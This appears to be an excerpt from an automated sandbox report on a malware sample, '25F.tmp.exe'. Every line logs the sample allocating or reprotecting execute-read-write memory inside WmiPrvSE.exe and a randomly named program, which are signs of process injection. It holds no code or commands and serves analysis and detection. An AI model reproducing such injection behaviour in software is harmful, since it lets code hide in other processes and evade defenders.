            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 260000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 5D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 230000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 190000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 250000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 2A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 270000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 130000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 2B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 2D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 150000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 750000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 120000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 550000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 250000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 2E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 390000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 90000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 380000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 820000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 380000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 3E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 280000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 5F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 2B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 130000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 8A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 8E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 410000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 130000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 140000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 3A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 160000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 130000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 140000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 190000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory allocated: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 1B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 1B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: C50000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: C50000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 3D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 380000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 410000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 350000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 310000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exe Memory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 130000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe Memory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 380000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\25F.tmp.exe Memory protected: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000 protect: page execute and read and write
